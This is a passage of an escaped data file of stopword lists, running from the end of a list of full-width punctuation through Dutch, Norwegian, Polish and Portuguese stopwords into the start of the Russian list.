\"［\",\n        \"］\",\n        \"｛\",\n       
 \"｜\",\n        \"｝\",\n        \"～\",\n        \"￥\",\n    ],\n    \"nl\": [\n        \"aan\",\n        \"achte\",\n        \"achter\",\n        \"af\",\n        \"al\",\n        \"alle\",\n        \"alleen\",\n        \"alles\",\n        \"als\",\n        \"ander\",\n        \"anders\",\n        \"beetje\",\n        \"behalve\",\n        \"beide\",\n        \"beiden\",\n        \"ben\",\n        \"beneden\",\n        \"bent\",\n        \"bij\",\n        \"bijna\",\n        \"bijv\",\n        \"blijkbaar\",\n        \"blijken\",\n        \"boven\",\n        \"bv\",\n        \"daar\",\n        \"daardoor\",\n        \"daarin\",\n        \"daarna\",\n        \"daarom\",\n        \"daaruit\",\n        \"dan\",\n        \"dat\",\n        \"de\",\n        \"deden\",\n        \"deed\",\n        \"derde\",\n        \"derhalve\",\n        \"dertig\",\n        \"deze\",\n        \"dhr\",\n        \"die\",\n        \"dit\",\n        \"doe\",\n        \"doen\",\n        \"doet\",\n        \"door\",\n        \"drie\",\n        \"duizend\",\n        \"echter\",\n        \"een\",\n        \"eens\",\n        \"eerst\",\n        \"eerste\",\n        \"eigen\",\n        \"eigenlijk\",\n        \"elk\",\n        \"elke\",\n        \"en\",\n        \"enige\",\n        \"er\",\n        \"erg\",\n        \"ergens\",\n        \"etc\",\n        \"etcetera\",\n        \"even\",\n        \"geen\",\n        \"genoeg\",\n        \"geweest\",\n        \"haar\",\n        \"haarzelf\",\n        \"had\",\n        \"hadden\",\n        \"heb\",\n        \"hebben\",\n        \"hebt\",\n        \"hedden\",\n        \"heeft\",\n        \"heel\",\n        \"hem\",\n        \"hemzelf\",\n        \"hen\",\n        \"het\",\n        \"hetzelfde\",\n        \"hier\",\n        \"hierin\",\n        \"hierna\",\n        \"hierom\",\n        \"hij\",\n        \"hijzelf\",\n        \"hoe\",\n        \"honderd\",\n        \"hun\",\n        \"ieder\",\n        \"iedere\",\n        \"iedereen\",\n        
\"iemand\",\n        \"iets\",\n        \"ik\",\n        \"in\",\n        \"inderdaad\",\n        \"intussen\",\n        \"is\",\n        \"ja\",\n        \"je\",\n        \"jij\",\n        \"jijzelf\",\n        \"jou\",\n        \"jouw\",\n        \"jullie\",\n        \"kan\",\n        \"kon\",\n        \"konden\",\n        \"kun\",\n        \"kunnen\",\n        \"kunt\",\n        \"laatst\",\n        \"later\",\n        \"lijken\",\n        \"lijkt\",\n        \"maak\",\n        \"maakt\",\n        \"maakte\",\n        \"maakten\",\n        \"maar\",\n        \"mag\",\n        \"maken\",\n        \"me\",\n        \"meer\",\n        \"meest\",\n        \"meestal\",\n        \"men\",\n        \"met\",\n        \"mevr\",\n        \"mij\",\n        \"mijn\",\n        \"minder\",\n        \"miss\",\n        \"misschien\",\n        \"missen\",\n        \"mits\",\n        \"mocht\",\n        \"mochten\",\n        \"moest\",\n        \"moesten\",\n        \"moet\",\n        \"moeten\",\n        \"mogen\",\n        \"mr\",\n        \"mrs\",\n        \"mw\",\n        \"na\",\n        \"naar\",\n        \"nam\",\n        \"namelijk\",\n        \"nee\",\n        \"neem\",\n        \"negen\",\n        \"nemen\",\n        \"nergens\",\n        \"niemand\",\n        \"niet\",\n        \"niets\",\n        \"niks\",\n        \"noch\",\n        \"nochtans\",\n        \"nog\",\n        \"nooit\",\n        \"nu\",\n        \"nv\",\n        \"of\",\n        \"om\",\n        \"omdat\",\n        \"ondanks\",\n        \"onder\",\n        \"ondertussen\",\n        \"ons\",\n        \"onze\",\n        \"onzeker\",\n        \"ooit\",\n        \"ook\",\n        \"op\",\n        \"over\",\n        \"overal\",\n        \"overige\",\n        \"paar\",\n        \"per\",\n        \"recent\",\n        \"redelijk\",\n        \"samen\",\n        \"sinds\",\n        \"steeds\",\n        \"te\",\n        \"tegen\",\n        \"tegenover\",\n        \"thans\",\n        \"tien\",\n        \"tiende\",\n  
      \"tijdens\",\n        \"tja\",\n        \"toch\",\n        \"toe\",\n        \"tot\",\n        \"totdat\",\n        \"tussen\",\n        \"twee\",\n        \"tweede\",\n        \"u\",\n        \"uit\",\n        \"uw\",\n        \"vaak\",\n        \"van\",\n        \"vanaf\",\n        \"veel\",\n        \"veertig\",\n        \"verder\",\n        \"verscheidene\",\n        \"verschillende\",\n        \"via\",\n        \"vier\",\n        \"vierde\",\n        \"vijf\",\n        \"vijfde\",\n        \"vijftig\",\n        \"volgend\",\n        \"volgens\",\n        \"voor\",\n        \"voordat\",\n        \"voorts\",\n        \"waar\",\n        \"waarom\",\n        \"waarschijnlijk\",\n        \"wanneer\",\n        \"waren\",\n        \"was\",\n        \"wat\",\n        \"we\",\n        \"wederom\",\n        \"weer\",\n        \"weinig\",\n        \"wel\",\n        \"welk\",\n        \"welke\",\n        \"werd\",\n        \"werden\",\n        \"werder\",\n        \"whatever\",\n        \"wie\",\n        \"wij\",\n        \"wijzelf\",\n        \"wil\",\n        \"wilden\",\n        \"willen\",\n        \"word\",\n        \"worden\",\n        \"wordt\",\n        \"zal\",\n        \"ze\",\n        \"zei\",\n        \"zeker\",\n        \"zelf\",\n        \"zelfde\",\n        \"zes\",\n        \"zeven\",\n        \"zich\",\n        \"zij\",\n        \"zijn\",\n        \"zijzelf\",\n        \"zo\",\n        \"zoals\",\n        \"zodat\",\n        \"zou\",\n        \"zouden\",\n        \"zulk\",\n        \"zullen\",\n    ],\n    \"no\": [\n        \"alle\",\n        \"at\",\n        \"av\",\n        \"bare\",\n        \"begge\",\n        \"ble\",\n        \"blei\",\n        \"bli\",\n        \"blir\",\n        \"blitt\",\n        \"både\",\n        \"båe\",\n        \"da\",\n        \"de\",\n        \"deg\",\n        \"dei\",\n        \"deim\",\n        \"deira\",\n        \"deires\",\n        \"dem\",\n        \"den\",\n        \"denne\",\n        \"der\",\n        
\"dere\",\n        \"deres\",\n        \"det\",\n        \"dette\",\n        \"di\",\n        \"din\",\n        \"disse\",\n        \"ditt\",\n        \"du\",\n        \"dykk\",\n        \"dykkar\",\n        \"då\",\n        \"eg\",\n        \"ein\",\n        \"eit\",\n        \"eitt\",\n        \"eller\",\n        \"elles\",\n        \"en\",\n        \"enn\",\n        \"er\",\n        \"et\",\n        \"ett\",\n        \"etter\",\n        \"for\",\n        \"fordi\",\n        \"fra\",\n        \"før\",\n        \"ha\",\n        \"hadde\",\n        \"han\",\n        \"hans\",\n        \"har\",\n        \"hennar\",\n        \"henne\",\n        \"hennes\",\n        \"her\",\n        \"hjå\",\n        \"ho\",\n        \"hoe\",\n        \"honom\",\n        \"hoss\",\n        \"hossen\",\n        \"hun\",\n        \"hva\",\n        \"hvem\",\n        \"hver\",\n        \"hvilke\",\n        \"hvilken\",\n        \"hvis\",\n        \"hvor\",\n        \"hvordan\",\n        \"hvorfor\",\n        \"i\",\n        \"ikke\",\n        \"ikkje\",\n        \"ingen\",\n        \"ingi\",\n        \"inkje\",\n        \"inn\",\n        \"inni\",\n        \"ja\",\n        \"jeg\",\n        \"kan\",\n        \"kom\",\n        \"korleis\",\n        \"korso\",\n        \"kun\",\n        \"kunne\",\n        \"kva\",\n        \"kvar\",\n        \"kvarhelst\",\n        \"kven\",\n        \"kvi\",\n        \"kvifor\",\n        \"man\",\n        \"mange\",\n        \"me\",\n        \"med\",\n        \"medan\",\n        \"meg\",\n        \"meget\",\n        \"mellom\",\n        \"men\",\n        \"mi\",\n        \"min\",\n        \"mine\",\n        \"mitt\",\n        \"mot\",\n        \"mykje\",\n        \"ned\",\n        \"no\",\n        \"noe\",\n        \"noen\",\n        \"noka\",\n        \"noko\",\n        \"nokon\",\n        \"nokor\",\n        \"nokre\",\n        \"nå\",\n        \"når\",\n        \"og\",\n        \"også\",\n        \"om\",\n        \"opp\",\n        \"oss\",\n        
\"over\",\n        \"på\",\n        \"samme\",\n        \"seg\",\n        \"selv\",\n        \"si\",\n        \"sia\",\n        \"sidan\",\n        \"siden\",\n        \"sin\",\n        \"sine\",\n        \"sitt\",\n        \"sjøl\",\n        \"skal\",\n        \"skulle\",\n        \"slik\",\n        \"so\",\n        \"som\",\n        \"somme\",\n        \"somt\",\n        \"så\",\n        \"sånn\",\n        \"til\",\n        \"um\",\n        \"upp\",\n        \"ut\",\n        \"uten\",\n        \"var\",\n        \"vart\",\n        \"varte\",\n        \"ved\",\n        \"vere\",\n        \"verte\",\n        \"vi\",\n        \"vil\",\n        \"ville\",\n        \"vore\",\n        \"vors\",\n        \"vort\",\n        \"vår\",\n        \"være\",\n        \"vært\",\n        \"å\",\n    ],\n    \"pl\": [\n        \"aby\",\n        \"ach\",\n        \"aj\",\n        \"albo\",\n        \"ale\",\n        \"ani\",\n        \"aż\",\n        \"bardzo\",\n        \"bez\",\n        \"bo\",\n        \"bowiem\",\n        \"by\",\n        \"byli\",\n        \"bym\",\n        \"być\",\n        \"był\",\n        \"była\",\n        \"było\",\n        \"były\",\n        \"będzie\",\n        \"będą\",\n        \"chce\",\n        \"choć\",\n        \"ci\",\n        \"ciebie\",\n        \"cię\",\n        \"co\",\n        \"coraz\",\n        \"coś\",\n        \"czy\",\n        \"czyli\",\n        \"często\",\n        \"daleko\",\n        \"dla\",\n        \"dlaczego\",\n        \"dlatego\",\n        \"do\",\n        \"dobrze\",\n        \"dokąd\",\n        \"dość\",\n        \"dr\",\n        \"dużo\",\n        \"dwa\",\n        \"dwaj\",\n        \"dwie\",\n        \"dwoje\",\n        \"dzisiaj\",\n        \"dziś\",\n        \"gdy\",\n        \"gdyby\",\n        \"gdyż\",\n        \"gdzie\",\n        \"go\",\n        \"godz\",\n        \"hab\",\n        \"i\",\n        \"ich\",\n        \"ii\",\n        \"iii\",\n        \"ile\",\n        \"im\",\n        \"inne\",\n        \"inny\",\n  
      \"inż\",\n        \"iv\",\n        \"ix\",\n        \"iż\",\n        \"ja\",\n        \"jak\",\n        \"jakby\",\n        \"jaki\",\n        \"jakie\",\n        \"jako\",\n        \"je\",\n        \"jeden\",\n        \"jedna\",\n        \"jednak\",\n        \"jedno\",\n        \"jednym\",\n        \"jedynie\",\n        \"jego\",\n        \"jej\",\n        \"jemu\",\n        \"jest\",\n        \"jestem\",\n        \"jeszcze\",\n        \"jeśli\",\n        \"jeżeli\",\n        \"już\",\n        \"ją\",\n        \"każdy\",\n        \"kiedy\",\n        \"kierunku\",\n        \"kilku\",\n        \"kto\",\n        \"która\",\n        \"które\",\n        \"którego\",\n        \"której\",\n        \"który\",\n        \"których\",\n        \"którym\",\n        \"którzy\",\n        \"ku\",\n        \"lat\",\n        \"lecz\",\n        \"lub\",\n        \"ma\",\n        \"mają\",\n        \"mam\",\n        \"mamy\",\n        \"mgr\",\n        \"mi\",\n        \"miał\",\n        \"mimo\",\n        \"mnie\",\n        \"mną\",\n        \"mogą\",\n        \"moi\",\n        \"moja\",\n        \"moje\",\n        \"może\",\n        \"można\",\n        \"mu\",\n        \"musi\",\n        \"my\",\n        \"mój\",\n        \"na\",\n        \"nad\",\n        \"nam\",\n        \"nami\",\n        \"nas\",\n        \"nasi\",\n        \"nasz\",\n        \"nasza\",\n        \"nasze\",\n        \"natychmiast\",\n        \"nawet\",\n        \"nic\",\n        \"nich\",\n        \"nie\",\n        \"niego\",\n        \"niej\",\n        \"niemu\",\n        \"nigdy\",\n        \"nim\",\n        \"nimi\",\n        \"nią\",\n        \"niż\",\n        \"no\",\n        \"nowe\",\n        \"np\",\n        \"nr\",\n        \"o\",\n        \"o.o.\",\n        \"obok\",\n        \"od\",\n        \"ok\",\n        \"około\",\n        \"on\",\n        \"ona\",\n        \"one\",\n        \"oni\",\n        \"ono\",\n        \"oraz\",\n        \"owszem\",\n        \"pan\",\n        \"pl\",\n        
\"po\",\n        \"pod\",\n        \"ponad\",\n        \"ponieważ\",\n        \"poza\",\n        \"prof\",\n        \"przed\",\n        \"przede\",\n        \"przedtem\",\n        \"przez\",\n        \"przy\",\n        \"raz\",\n        \"razie\",\n        \"roku\",\n        \"również\",\n        \"sam\",\n        \"sama\",\n        \"się\",\n        \"skąd\",\n        \"sobie\",\n        \"sposób\",\n        \"swoje\",\n        \"są\",\n        \"ta\",\n        \"tak\",\n        \"taki\",\n        \"takich\",\n        \"takie\",\n        \"także\",\n        \"tam\",\n        \"te\",\n        \"tego\",\n        \"tej\",\n        \"tel\",\n        \"temu\",\n        \"ten\",\n        \"teraz\",\n        \"też\",\n        \"to\",\n        \"tobie\",\n        \"tobą\",\n        \"trzeba\",\n        \"tu\",\n        \"tutaj\",\n        \"twoi\",\n        \"twoja\",\n        \"twoje\",\n        \"twój\",\n        \"ty\",\n        \"tych\",\n        \"tylko\",\n        \"tym\",\n        \"tys\",\n        \"tzw\",\n        \"tę\",\n        \"u\",\n        \"ul\",\n        \"vi\",\n        \"vii\",\n        \"viii\",\n        \"vol\",\n        \"w\",\n        \"wam\",\n        \"wami\",\n        \"was\",\n        \"wasi\",\n        \"wasz\",\n        \"wasza\",\n        \"wasze\",\n        \"we\",\n        \"wie\",\n        \"więc\",\n        \"wszystko\",\n        \"wtedy\",\n        \"www\",\n        \"wy\",\n        \"właśnie\",\n        \"wśród\",\n        \"xi\",\n        \"xii\",\n        \"xiii\",\n        \"xiv\",\n        \"xv\",\n        \"z\",\n        \"za\",\n        \"zawsze\",\n        \"zaś\",\n        \"ze\",\n        \"zł\",\n        \"żaden\",\n        \"że\",\n        \"żeby\",\n    ],\n    \"pt\": [\n        \"a\",\n        \"acerca\",\n        \"adeus\",\n        \"agora\",\n        \"ainda\",\n        \"algmas\",\n        \"algo\",\n        \"algumas\",\n        \"alguns\",\n        \"ali\",\n        \"além\",\n        \"ambos\",\n        \"ano\",\n  
      \"anos\",\n        \"antes\",\n        \"ao\",\n        \"aos\",\n        \"apenas\",\n        \"apoio\",\n        \"apontar\",\n        \"após\",\n        \"aquela\",\n        \"aquelas\",\n        \"aquele\",\n        \"aqueles\",\n        \"aqui\",\n        \"aquilo\",\n        \"as\",\n        \"assim\",\n        \"através\",\n        \"atrás\",\n        \"até\",\n        \"aí\",\n        \"baixo\",\n        \"bastante\",\n        \"bem\",\n        \"bom\",\n        \"breve\",\n        \"cada\",\n        \"caminho\",\n        \"catorze\",\n        \"cedo\",\n        \"cento\",\n        \"certamente\",\n        \"certeza\",\n        \"cima\",\n        \"cinco\",\n        \"coisa\",\n        \"com\",\n        \"como\",\n        \"comprido\",\n        \"conhecido\",\n        \"conselho\",\n        \"contra\",\n        \"corrente\",\n        \"custa\",\n        \"cá\",\n        \"da\",\n        \"daquela\",\n        \"daquele\",\n        \"dar\",\n        \"das\",\n        \"de\",\n        \"debaixo\",\n        \"demais\",\n        \"dentro\",\n        \"depois\",\n        \"desde\",\n        \"desligado\",\n        \"dessa\",\n        \"desse\",\n        \"desta\",\n        \"deste\",\n        \"deve\",\n        \"devem\",\n        \"deverá\",\n        \"dez\",\n        \"dezanove\",\n        \"dezasseis\",\n        \"dezassete\",\n        \"dezoito\",\n        \"dia\",\n        \"diante\",\n        \"direita\",\n        \"diz\",\n        \"dizem\",\n        \"dizer\",\n        \"do\",\n        \"dois\",\n        \"dos\",\n        \"doze\",\n        \"duas\",\n        \"dá\",\n        \"dão\",\n        \"dúvida\",\n        \"e\",\n        \"ela\",\n        \"elas\",\n        \"ele\",\n        \"eles\",\n        \"em\",\n        \"embora\",\n        \"enquanto\",\n        \"entre\",\n        \"então\",\n        \"era\",\n        \"essa\",\n        \"essas\",\n        \"esse\",\n        \"esses\",\n        \"esta\",\n        \"estado\",\n        \"estar\",\n   
     \"estará\",\n        \"estas\",\n        \"estava\",\n        \"este\",\n        \"estes\",\n        \"esteve\",\n        \"estive\",\n        \"estivemos\",\n        \"estiveram\",\n        \"estiveste\",\n        \"estivestes\",\n        \"estou\",\n        \"está\",\n        \"estás\",\n        \"estão\",\n        \"eu\",\n        \"exemplo\",\n        \"falta\",\n        \"fará\",\n        \"favor\",\n        \"faz\",\n        \"fazeis\",\n        \"fazem\",\n        \"fazemos\",\n        \"fazer\",\n        \"fazes\",\n        \"fazia\",\n        \"faço\",\n        \"fez\",\n        \"fim\",\n        \"final\",\n        \"foi\",\n        \"fomos\",\n        \"for\",\n        \"fora\",\n        \"foram\",\n        \"forma\",\n        \"foste\",\n        \"fostes\",\n        \"fui\",\n        \"geral\",\n        \"grande\",\n        \"grandes\",\n        \"grupo\",\n        \"hoje\",\n        \"horas\",\n        \"há\",\n        \"iniciar\",\n        \"inicio\",\n        \"ir\",\n        \"irá\",\n        \"isso\",\n        \"ista\",\n        \"iste\",\n        \"isto\",\n        \"já\",\n        \"lado\",\n        \"ligado\",\n        \"local\",\n        \"logo\",\n        \"longe\",\n        \"lugar\",\n        \"lá\",\n        \"maior\",\n        \"maioria\",\n        \"maiorias\",\n        \"mais\",\n        \"mal\",\n        \"mas\",\n        \"me\",\n        \"meio\",\n        \"menor\",\n        \"menos\",\n        \"meses\",\n        \"mesmo\",\n        \"meu\",\n        \"meus\",\n        \"mil\",\n        \"minha\",\n        \"minhas\",\n        \"momento\",\n        \"muito\",\n        \"muitos\",\n        \"máximo\",\n        \"mês\",\n        \"na\",\n        \"nada\",\n        \"naquela\",\n        \"naquele\",\n        \"nas\",\n        \"nem\",\n        \"nenhuma\",\n        \"nessa\",\n        \"nesse\",\n        \"nesta\",\n        \"neste\",\n        \"no\",\n        \"noite\",\n        \"nome\",\n        \"nos\",\n        \"nossa\",\n    
    \"nossas\",\n        \"nosso\",\n        \"nossos\",\n        \"nova\",\n        \"nove\",\n        \"novo\",\n        \"novos\",\n        \"num\",\n        \"numa\",\n        \"nunca\",\n        \"não\",\n        \"nível\",\n        \"nós\",\n        \"número\",\n        \"o\",\n        \"obra\",\n        \"obrigada\",\n        \"obrigado\",\n        \"oitava\",\n        \"oitavo\",\n        \"oito\",\n        \"onde\",\n        \"ontem\",\n        \"onze\",\n        \"os\",\n        \"ou\",\n        \"outra\",\n        \"outras\",\n        \"outro\",\n        \"outros\",\n        \"para\",\n        \"parece\",\n        \"parte\",\n        \"partir\",\n        \"pegar\",\n        \"pela\",\n        \"pelas\",\n        \"pelo\",\n        \"pelos\",\n        \"perto\",\n        \"pessoas\",\n        \"pode\",\n        \"podem\",\n        \"poder\",\n        \"poderá\",\n        \"podia\",\n        \"ponto\",\n        \"pontos\",\n        \"por\",\n        \"porque\",\n        \"porquê\",\n        \"posição\",\n        \"possivelmente\",\n        \"posso\",\n        \"possível\",\n        \"pouca\",\n        \"pouco\",\n        \"povo\",\n        \"primeira\",\n        \"primeiro\",\n        \"promeiro\",\n        \"próprio\",\n        \"próximo\",\n        \"puderam\",\n        \"pôde\",\n        \"põe\",\n        \"põem\",\n        \"qual\",\n        \"qualquer\",\n        \"quando\",\n        \"quanto\",\n        \"quarta\",\n        \"quarto\",\n        \"quatro\",\n        \"que\",\n        \"quem\",\n        \"quer\",\n        \"quero\",\n        \"questão\",\n        \"quieto\",\n        \"quinta\",\n        \"quinto\",\n        \"quinze\",\n        \"quê\",\n        \"relação\",\n        \"sabe\",\n        \"saber\",\n        \"se\",\n        \"segunda\",\n        \"segundo\",\n        \"sei\",\n        \"seis\",\n        \"sem\",\n        \"sempre\",\n        \"ser\",\n        \"seria\",\n        \"sete\",\n        \"seu\",\n        \"seus\",\n        
\"sexta\",\n        \"sexto\",\n        \"sim\",\n        \"sistema\",\n        \"sob\",\n        \"sobre\",\n        \"sois\",\n        \"somente\",\n        \"somos\",\n        \"sou\",\n        \"sua\",\n        \"suas\",\n        \"são\",\n        \"sétima\",\n        \"sétimo\",\n        \"tal\",\n        \"talvez\",\n        \"também\",\n        \"tanto\",\n        \"tarde\",\n        \"te\",\n        \"tem\",\n        \"temos\",\n        \"tempo\",\n        \"tendes\",\n        \"tenho\",\n        \"tens\",\n        \"tentar\",\n        \"tentaram\",\n        \"tente\",\n        \"tentei\",\n        \"ter\",\n        \"terceira\",\n        \"terceiro\",\n        \"teu\",\n        \"teus\",\n        \"teve\",\n        \"tipo\",\n        \"tive\",\n        \"tivemos\",\n        \"tiveram\",\n        \"tiveste\",\n        \"tivestes\",\n        \"toda\",\n        \"todas\",\n        \"todo\",\n        \"todos\",\n        \"trabalhar\",\n        \"trabalho\",\n        \"treze\",\n        \"três\",\n        \"tu\",\n        \"tua\",\n        \"tuas\",\n        \"tudo\",\n        \"tão\",\n        \"têm\",\n        \"um\",\n        \"uma\",\n        \"umas\",\n        \"uns\",\n        \"usa\",\n        \"usar\",\n        \"vai\",\n        \"vais\",\n        \"valor\",\n        \"veja\",\n        \"vem\",\n        \"vens\",\n        \"ver\",\n        \"verdade\",\n        \"verdadeiro\",\n        \"vez\",\n        \"vezes\",\n        \"viagem\",\n        \"vindo\",\n        \"vinte\",\n        \"você\",\n        \"vocês\",\n        \"vos\",\n        \"vossa\",\n        \"vossas\",\n        \"vosso\",\n        \"vossos\",\n        \"vários\",\n        \"vão\",\n        \"vêm\",\n        \"vós\",\n        \"zero\",\n        \"à\",\n        \"às\",\n        \"área\",\n        \"é\",\n        \"és\",\n        \"último\",\n    ],\n    \"ru\": [\n        \"а\",\n        \"алло\",\n        \"без\",\n        \"белый\",\n        \"близко\",\n        \"более\",\n        
\"больше\",\n        \"большой\",\n        \"будем\",\n        \"будет\",\n        \"будете\",\n        \"будешь\",\n        \"будто\",\n        \"буду\",\n        \"будут\",\n        \"будь\",\n        \"бы\",\n        \"бывает\",\n        \"бывь\",\n        \"был\",\n        \"была\",\n        \"были\",\n        \"было\",\n        \"быть\",\n        \"в\",\n        \"важная\",\n        \"важное\",\n        \"важные\",\n        \"важный\",\n        \"вам\",\n        \"вами\",\n        \"вас\",\n        \"ваш\",\n        \"ваша\",\n        \"ваше\",\n        \"ваши\",\n        \"вверх\",\n        \"вдали\",\n        \"вдруг\",\n        \"ведь\",\n        \"везде\",\n        \"вернуться\",\n        \"весь\",\n        \"вечер\",\n        \"взгляд\",\n        \"взять\",\n        \"вид\",\n        \"видеть\",\n        \"вместе\",\n        \"вниз\",\n        \"внизу\",\n        \"во\",\n        \"вода\",\n        \"война\",\n        \"вокруг\",\n        \"вон\",\n        \"вообще\",\n        \"вопрос\",\n        \"восемнадцатый\",\n        \"восемнадцать\",\n        \"восемь\",\n        \"восьмой\",\n        \"вот\",\n        \"впрочем\",\n        \"времени\",\n        \"время\",\n        \"все\",\n        \"всегда\",\n        \"всего\",\n        \"всем\",\n        \"всеми\",\n        \"всему\",\n        \"всех\",\n        \"всею\",\n        \"всю\",\n        \"всюду\",\n        \"вся\",\n        \"всё\",\n        \"второй\",\n        \"вы\",\n        \"выйти\",\n        \"г\",\n        \"где\",\n        \"главный\",\n        \"глаз\",\n        \"говорил\",\n        \"говорит\",\n        \"говорить\",\n        \"год\",\n        \"года\",\n        \"году\",\n        \"голова\",\n        \"голос\",\n        \"город\",\n        \"да\",\n        \"давать\",\n        \"давно\",\n        \"даже\",\n        \"далекий\",\n        \"далеко\",\n        \"дальше\",\n        \"даром\",\n        \"дать\",\n        \"два\",\n        \"двадцатый\",\n        \"двадцать\",\n        
\"две\",\n        \"двенадцатый\",\n        \"двенадцать\",\n        \"дверь\",\n        \"двух\",\n        \"девятнадцатый\",\n        \"девятнадцать\",\n        \"девятый\",\n        \"девять\",\n        \"действительно\",\n        \"дел\",\n        \"делать\",\n        \"дело\",\n        \"день\",\n        \"деньги\",\n        \"десятый\",\n        \"десять\",\n        \"для\",\n        \"до\",\n        \"довольно\",\n        \"долго\",\n        \"должно\",\n        \"должный\",\n        \"дом\",\n        \"дорога\",\n        \"друг\",\n        \"другая\",\n        \"другие\",\n        \"других\",\n        \"друго\",\n        \"другое\",\n        \"другой\",\n        \"думать\",\n        \"душа\",\n        \"е\",\n        \"его\",\n        \"ее\",\n        \"ей\",\n        \"ему\",\n        \"если\",\n        \"есть\",\n        \"еще\",\n        \"ещё\",\n        \"ею\",\n        \"её\",\n        \"ж\",\n        \"ждать\",\n        \"же\",\n        \"жена\",\n        \"женщина\",\n        \"жизнь\",\n        \"жить\",\n        \"за\",\n        \"занят\",\n        \"занята\",\n        \"занято\",\n        \"заняты\",\n        \"затем\",\n        \"зато\",\n        \"зачем\",\n        \"здесь\",\n        \"земля\",\n        \"знать\",\n        \"значит\",\n        \"значить\",\n        \"и\",\n        \"идти\",\n        \"из\",\n        \"или\",\n        \"им\",\n        \"именно\",\n        \"иметь\",\n        \"ими\",\n        \"имя\",\n        \"иногда\",\n        \"их\",\n        \"к\",\n        \"каждая\",\n        \"каждое\",\n        \"каждые\",\n        \"каждый\",\n        \"кажется\",\n        \"казаться\",\n        \"как\",\n        \"какая\",\n        \"какой\",\n        \"кем\",\n        \"книга\",\n        \"когда\",\n        \"кого\",\n        \"ком\",\n        \"комната\",\n        \"кому\",\n        \"конец\",\n        \"конечно\",\n        \"которая\",\n        \"которого\",\n        \"которой\",\n        \"которые\",\n        \"который\",\n      
  \"которых\",\n        \"кроме\",\n        \"кругом\",\n        \"кто\",\n        \"куда\",\n        \"лежать\",\n        \"лет\",\n        \"ли\",\n        \"лицо\",\n        \"лишь\",\n        \"лучше\",\n        \"любить\",\n        \"люди\",\n        \"м\",\n        \"маленький\",\n        \"мало\",\n        \"мать\",\n        \"машина\",\n        \"между\",\n        \"меля\",\n        \"менее\",\n        \"меньше\",\n        \"меня\",\n        \"место\",\n        \"миллионов\",\n        \"мимо\",\n        \"минута\",\n        \"мир\",\n        \"мира\",\n        \"мне\",\n        \"много\",\n        \"многочисленная\",\n        \"многочисленное\",\n        \"многочисленные\",\n        \"многочисленный\",\n        \"мной\",\n        \"мною\",\n        \"мог\",\n        \"могут\",\n        \"мож\",\n        \"может\",\n        \"можно\",\n        \"можхо\",\n        \"мои\",\n        \"мой\",\n        \"мор\",\n        \"москва\",\n        \"мочь\",\n        \"моя\",\n        \"моё\",\n        \"мы\",\n        \"на\",\n        \"наверху\",\n        \"над\",\n        \"надо\",\n        \"назад\",\n        \"наиболее\",\n        \"найти\",\n        \"наконец\",\n        \"нам\",\n        \"нами\",\n        \"народ\",\n        \"нас\",\n        \"начала\",\n        \"начать\",\n        \"наш\",\n        \"наша\",\n        \"наше\",\n        \"наши\",\n        \"не\",\n        \"него\",\n        \"недавно\",\n        \"недалеко\",\n        \"нее\",\n        \"ней\",\n        \"некоторый\",\n        \"нельзя\",\n        \"нем\",\n        \"немного\",\n        \"нему\",\n        \"непрерывно\",\n        \"нередко\",\n        \"несколько\",\n        \"нет\",\n        \"нею\",\n        \"неё\",\n        \"ни\",\n        \"нибудь\",\n        \"ниже\",\n        \"низко\",\n        \"никакой\",\n        \"никогда\",\n        \"никто\",\n        \"никуда\",\n        \"ними\",\n        \"них\",\n        \"ничего\",\n        \"ничто\",\n        \"но\",\n        \"новый\",\n  
      \"нога\",\n        \"ночь\",\n        \"ну\",\n        \"нужно\",\n        \"нужный\",\n        \"нх\",\n        \"о\",\n        \"об\",\n        \"оба\",\n        \"обычно\",\n        \"один\",\n        \"одиннадцатый\",\n        \"одиннадцать\",\n        \"однажды\",\n        \"однако\",\n        \"одного\",\n        \"одной\",\n        \"оказаться\",\n        \"окно\",\n        \"около\",\n        \"он\",\n        \"она\",\n        \"они\",\n        \"оно\",\n        \"опять\",\n        \"особенно\",\n        \"остаться\",\n        \"от\",\n        \"ответить\",\n        \"отец\",\n        \"отовсюду\",\n        \"отсюда\",\n        \"очень\",\n        \"первый\",\n        \"перед\",\n        \"писать\",\n        \"плечо\",\n        \"по\",\n        \"под\",\n        \"подумать\",\n        \"пожалуйста\",\n        \"позже\",\n        \"пойти\",\n        \"пока\",\n        \"пол\",\n        \"получить\",\n        \"помнить\",\n        \"понимать\",\n        \"понять\",\n        \"пор\",\n        \"пора\",\n        \"после\",\n        \"последний\",\n        \"посмотреть\",\n        \"посреди\",\n        \"потом\",\n        \"потому\",\n        \"почему\",\n        \"почти\",\n        \"правда\",\n        \"прекрасно\",\n        \"при\",\n        \"про\",\n        \"просто\",\n        \"против\",\n        \"процентов\",\n        \"пятнадцатый\",\n        \"пятнадцать\",\n        \"пятый\",\n        \"пять\",\n        \"работа\",\n        \"работать\",\n        \"раз\",\n        \"разве\",\n        \"рано\",\n        \"раньше\",\n        \"ребенок\",\n        \"решить\",\n        \"россия\",\n        \"рука\",\n        \"русский\",\n        \"ряд\",\n        \"рядом\",\n        \"с\",\n        \"сам\",\n        \"сама\",\n        \"сами\",\n        \"самим\",\n        \"самими\",\n        \"самих\",\n        \"само\",\n        \"самого\",\n        \"самой\",\n        \"самом\",\n        \"самому\",\n        \"саму\",\n        \"самый\",\n        \"свет\",\n   
     \"свое\",\n        \"своего\",\n        \"своей\",\n        \"свои\",\n        \"своих\",\n        \"свой\",\n        \"свою\",\n        \"сделать\",\n        \"сеаой\",\n        \"себе\",\n        \"себя\",\n        \"сегодня\",\n        \"седьмой\",\n        \"сейчас\",\n        \"семнадцатый\",\n        \"семнадцать\",\n        \"семь\",\n        \"сидеть\",\n        \"сила\",\n        \"сих\",\n        \"сказал\",\n        \"сказала\",\n        \"сказать\",\n        \"сколько\",\n        \"слишком\",\n        \"слово\",\n        \"случай\",\n        \"смотреть\",\n        \"сначала\",\n        \"снова\",\n        \"со\",\n        \"собой\",\n        \"собою\",\n        \"советский\",\n        \"совсем\",\n        \"спасибо\",\n        \"спросить\",\n        \"сразу\",\n        \"стал\",\n        \"старый\",\n        \"стать\",\n        \"стол\",\n        \"сторона\",\n        \"стоять\",\n        \"страна\",\n        \"суть\",\n        \"считать\",\n        \"т\",\n        \"та\",\n        \"так\",\n        \"такая\",\n        \"также\",\n        \"таки\",\n        \"такие\",\n        \"такое\",\n        \"такой\",\n        \"там\",\n        \"твой\",\n        \"твоя\",\n        \"твоё\",\n        \"те\",\n        \"тебе\",\n        \"тебя\",\n        \"тем\",\n        \"теми\",\n        \"теперь\",\n        \"тех\",\n        